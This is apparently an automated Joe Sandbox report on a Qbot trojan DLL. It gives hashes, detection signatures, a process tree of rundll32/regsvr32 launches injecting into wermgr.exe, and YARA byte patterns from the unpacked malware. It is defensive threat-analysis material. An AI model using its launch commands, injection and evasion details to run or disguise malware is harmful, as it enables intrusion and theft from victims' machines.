Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
pebbles.dat.dll

Overview

General Information

Sample Name:pebbles.dat.dll
Analysis ID:715156
MD5:d89521adaf6418e6ebe43b1a1a9d2af9
SHA1:38cac8495ef43e51cdac1cb5e85d10137b365bee
SHA256:1965dc57456d4fc01b6ce0f242d80776fe08a16354e6177255cba618348355ac
Tags:dll
Infos:

Detection

Qbot
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Qbot
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: Execute DLL with spoofed extension
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Writes to foreign memory regions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Allocates memory in foreign processes
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to record screenshots
Entry point lies outside standard sections
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Drops PE files
Tries to load missing DLLs
Found evasive API chain checking for process token information
Registers a DLL
PE file overlay found
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 5860 cmdline: loaddll32.exe "C:\Users\user\Desktop\pebbles.dat.dll" MD5: 1F562FBF37040EC6C43C8D5EF619EA39)
    • conhost.exe (PID: 5868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 5896 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5916 cmdline: rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • wermgr.exe (PID: 5996 cmdline: C:\Windows\SysWOW64\wermgr.exe MD5: CCF15E662ED5CE77B5FF1A7AAE305233)
    • regsvr32.exe (PID: 5904 cmdline: regsvr32.exe /s C:\Users\user\Desktop\pebbles.dat.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • wermgr.exe (PID: 5988 cmdline: C:\Windows\SysWOW64\wermgr.exe MD5: CCF15E662ED5CE77B5FF1A7AAE305233)
    • rundll32.exe (PID: 5924 cmdline: rundll32.exe C:\Users\user\Desktop\pebbles.dat.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • wermgr.exe (PID: 6004 cmdline: C:\Windows\SysWOW64\wermgr.exe MD5: CCF15E662ED5CE77B5FF1A7AAE305233)
    • rundll32.exe (PID: 5968 cmdline: rundll32.exe C:\Users\user\Desktop\pebbles.dat.dll,DllUnregisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6040 cmdline: rundll32.exe C:\Users\user\Desktop\pebbles.dat.dll,bewailable MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
    00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmpWindows_Trojan_Qbot_92c67a6dunknownunknown
    • 0x10f4f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
    00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmpWindows_Trojan_Qbot_3074a8d4unknownunknown
    • 0x1ca14:$a4: %u;%u;%u;
    • 0x1cf50:$a5: %u.%u.%u.%u.%u.%u.%04x
    • 0x1cdd8:$a6: %u&%s&%u
    • 0x8cc6:$get_string1: 33 D2 8B C6 6A 5A 5F F7 F7 8B 7D 08 8A 04 3A 8B 55 F8 8B 7D 10 3A 04 16
    • 0x9004:$set_key: 8D 87 00 04 00 00 50 56 E8 BF 15 00 00 59 8B D0 8B CE E8
    • 0x3330:$do_computer_use_russian_like_keyboard: B9 FF 03 00 00 66 23 C1 33 C9 0F B7 F8 66 3B 7C 4D
    • 0x2d87:$execute_each_tasks: 8B 44 0E 0C 85 C0 74 04 FF D0 EB 12 6A 00 6A 00 6A 00 FF 74 0E 08 E8 F5 EF FF FF 83 C4 10
    • 0xc8ee:$generate_random_alpha_num_string: 57 E8 DC DC FF FF 48 50 8D 85 30 F6 FF FF 6A 00 50 E8 D1 6D 00 00 8B 4D F8 83 C4 10 8A 04 38 88 04 0E 46 83 FE 0C
    00000004.00000003.245679829.00000000032E0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
      00000004.00000003.245679829.00000000032E0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Qbot_92c67a6dunknownunknown
      • 0x1034f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
      Click to see the 28 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      8.2.wermgr.exe.2d40000.0.raw.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
        8.2.wermgr.exe.2d40000.0.raw.unpackWindows_Trojan_Qbot_92c67a6dunknownunknown
        • 0x10f4f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
        8.2.wermgr.exe.2d40000.0.raw.unpackWindows_Trojan_Qbot_3074a8d4unknownunknown
        • 0x1ca14:$a4: %u;%u;%u;
        • 0x1cf50:$a5: %u.%u.%u.%u.%u.%u.%04x
        • 0x1cdd8:$a6: %u&%s&%u
        • 0x8cc6:$get_string1: 33 D2 8B C6 6A 5A 5F F7 F7 8B 7D 08 8A 04 3A 8B 55 F8 8B 7D 10 3A 04 16
        • 0x9004:$set_key: 8D 87 00 04 00 00 50 56 E8 BF 15 00 00 59 8B D0 8B CE E8
        • 0x3330:$do_computer_use_russian_like_keyboard: B9 FF 03 00 00 66 23 C1 33 C9 0F B7 F8 66 3B 7C 4D
        • 0x2d87:$execute_each_tasks: 8B 44 0E 0C 85 C0 74 04 FF D0 EB 12 6A 00 6A 00 6A 00 FF 74 0E 08 E8 F5 EF FF FF 83 C4 10
        • 0xc8ee:$generate_random_alpha_num_string: 57 E8 DC DC FF FF 48 50 8D 85 30 F6 FF FF 6A 00 50 E8 D1 6D 00 00 8B 4D F8 83 C4 10 8A 04 38 88 04 0E 46 83 FE 0C
        8.0.wermgr.exe.2d40000.0.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
          8.0.wermgr.exe.2d40000.0.unpackWindows_Trojan_Qbot_92c67a6dunknownunknown
          • 0x1034f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
          Click to see the 61 entries

          Sigma Signatures

          Data Obfuscation

          barindex
          Sigma detected: Execute DLL with spoofed extension
          Source: Process startedAuthor: Joe Security: Data: Command: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1, CommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: loaddll32.exe "C:\Users\user\Desktop\pebbles.dat.dll", ParentImage: C:\Windows\System32\loaddll32.exe, ParentProcessId: 5860, ParentProcessName: loaddll32.exe, ProcessCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1, ProcessId: 5896, ProcessName: cmd.exe

          Snort Signatures

          No Snort rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: pebbles.dat.dllReversingLabs: Detection: 16%
          Machine Learning detection for sample
          Source: pebbles.dat.dllJoe Sandbox ML: detected
          Source: pebbles.dat.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
          Source: pebbles.dat.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: E:\cpp\out\out\desktop.pdb source: regsvr32.exe, 00000003.00000002.252814839.000000006D954000.00000080.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.253212407.000000006D954000.00000080.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.252999477.000000006D954000.00000080.00000001.01000000.00000003.sdmp, pebbles.dat.dll
          Source: Binary string: amstream.pdb source: wermgr.exe, 00000007.00000003.254565864.0000000003051000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000008.00000003.254363547.0000000003491000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.253774638.0000000002F31000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: amstream.pdbGCTL source: wermgr.exe, 00000007.00000003.254565864.0000000003051000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000008.00000003.254363547.0000000003491000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.253774638.0000000002F31000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0316C123 FindFirstFileW,FindNextFileW,3_2_0316C123
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0346C123 FindFirstFileW,FindNextFileW,4_2_0346C123
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_03165D1E GetDC,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,BitBlt,GetCursorInfo,CopyIcon,GetIconInfo,GetObjectW,DrawIconEx,SelectObject,GetObjectW,GetDIBits,DeleteDC,DeleteDC,DeleteObject,3_2_03165D1E

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 8.2.wermgr.exe.2d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 8.2.wermgr.exe.2d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 8.0.wermgr.exe.2d40000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 8.0.wermgr.exe.2d40000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 3.3.regsvr32.exe.3140000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 3.3.regsvr32.exe.3140000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 5.3.rundll32.exe.4a40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 5.3.rundll32.exe.4a40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 7.0.wermgr.exe.2c60000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 7.0.wermgr.exe.2c60000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 4.3.rundll32.exe.32e0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 4.3.rundll32.exe.32e0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 5.2.rundll32.exe.4a60000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 5.2.rundll32.exe.4a60000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 4.2.rundll32.exe.3460000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 4.2.rundll32.exe.3460000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 8.0.wermgr.exe.2d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 8.0.wermgr.exe.2d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 7.2.wermgr.exe.2c60000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 7.2.wermgr.exe.2c60000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 3.3.regsvr32.exe.3140000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 3.3.regsvr32.exe.3140000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 5.2.rundll32.exe.4a60000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 5.2.rundll32.exe.4a60000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 3.2.regsvr32.exe.3160000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 3.2.regsvr32.exe.3160000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 5.3.rundll32.exe.4a40000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 5.3.rundll32.exe.4a40000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 8.2.wermgr.exe.2d40000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 8.2.wermgr.exe.2d40000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 4.2.rundll32.exe.3460000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 4.2.rundll32.exe.3460000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 9.0.wermgr.exe.29b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 9.0.wermgr.exe.29b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 9.0.wermgr.exe.29b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 9.0.wermgr.exe.29b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 7.2.wermgr.exe.2c60000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 7.2.wermgr.exe.2c60000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 3.2.regsvr32.exe.3160000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 3.2.regsvr32.exe.3160000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 7.0.wermgr.exe.2c60000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 7.0.wermgr.exe.2c60000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 4.3.rundll32.exe.32e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 4.3.rundll32.exe.32e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000004.00000003.245679829.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000004.00000003.245679829.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000009.00000000.252174416.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000009.00000000.252174416.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000007.00000000.251843249.0000000002C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000007.00000000.251843249.0000000002C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000003.00000003.245541502.0000000003140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000003.00000003.245541502.0000000003140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000008.00000002.254770959.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000008.00000002.254770959.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000008.00000000.251930910.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000008.00000000.251930910.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000005.00000002.252831702.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000005.00000002.252831702.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000005.00000003.246084770.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000005.00000003.246084770.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000007.00000002.254795791.0000000002C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000007.00000002.254795791.0000000002C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: pebbles.dat.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
          Source: 8.2.wermgr.exe.2d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 8.2.wermgr.exe.2d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 8.0.wermgr.exe.2d40000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 8.0.wermgr.exe.2d40000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 3.3.regsvr32.exe.3140000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 3.3.regsvr32.exe.3140000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 5.3.rundll32.exe.4a40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 5.3.rundll32.exe.4a40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 7.0.wermgr.exe.2c60000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 7.0.wermgr.exe.2c60000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 4.3.rundll32.exe.32e0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 4.3.rundll32.exe.32e0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 5.2.rundll32.exe.4a60000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 5.2.rundll32.exe.4a60000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 4.2.rundll32.exe.3460000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 4.2.rundll32.exe.3460000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 8.0.wermgr.exe.2d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
